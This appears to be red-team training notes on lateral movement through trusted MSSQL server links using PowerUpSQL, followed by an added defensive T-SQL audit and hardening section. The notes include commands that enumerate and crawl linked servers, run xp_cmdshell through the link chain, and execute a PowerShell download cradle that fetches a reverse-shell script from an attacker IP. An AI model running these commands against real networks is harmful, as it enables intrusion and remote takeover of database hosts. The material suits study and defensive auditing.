Trust Abuse - MSSQL Servers

  • MS SQL servers are widely deployed in a typical Windows domain.

  • SQL Servers provide very good options for lateral movement, as domain users can be mapped to database roles.

  • For MSSQL and PowerShell hackery, let's use PowerUpSQL https://github.com/NetSPI/PowerUpSQL

MSSQL Servers

#Discovery (SPN Scanning)
Get-SQLInstanceDomain

#Check Accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

#Gather Information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

#Look for links to remote servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose


#Enumerating Database Links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose


#Executing Commands through the link chain (the query is run on every reachable link; xp_cmdshell must be enabled on the target)
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"

#Execute a PowerShell download-execute cradle to execute a PowerShell reverse shell:
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/Invoke-PowerShellTcp.ps1'')"'
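Defender's side of the same trust: an added T-SQL audit (my own, not part of these notes or of PowerUpSQL) to run on each instance Get-SQLInstanceDomain finds, surfacing the two conditions the link crawl above depends on. <link_name> is a placeholder.

```sql
-- Added audit query (not from the original notes or PowerUpSQL).
-- Goal: find links that hand a stored remote login to every local login,
-- and check whether xp_cmdshell is switched on.

-- 1. Linked servers and the credential mapping each one uses.
--    uses_self_credential = 1 -> the caller's own identity is passed through
--    uses_self_credential = 0 -> a stored remote login is used instead
--    local_principal_id  = 0 -> the mapping applies to ALL local logins
SELECT  s.name                    AS link_name,
        s.data_source,
        s.is_rpc_out_enabled,     -- required for EXEC ... AT link / xp_cmdshell over the link
        s.is_data_access_enabled, -- required for OPENQUERY through the link
        l.local_principal_id,
        l.uses_self_credential,
        l.remote_name             -- stored SQL login the link connects as
FROM    sys.servers s
JOIN    sys.linked_logins l ON l.server_id = s.server_id
WHERE   s.is_linked = 1
  AND   l.uses_self_credential = 0
  AND   l.remote_name IS NOT NULL
ORDER BY s.name;

-- 2. Is xp_cmdshell enabled on this instance? (value_in_use = 1 means yes)
--    sys.configurations lists advanced options even when they are hidden
--    from sp_configure output.
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'show advanced options');

-- 3. Hardening to apply per finding after review. <link_name> is a placeholder
--    for a name returned by query 1.
-- EXEC sp_serveroption @server = N'<link_name>', @optname = 'rpc out', @optvalue = 'false';
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0;          RECONFIGURE;
```

Links that map to a high-privileged remote_name with rpc out enabled are the ones Get-SQLServerLinkCrawl chains through; pair this audit with SQL Audit or Extended Events on xp_cmdshell execution to catch use rather than just exposure.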
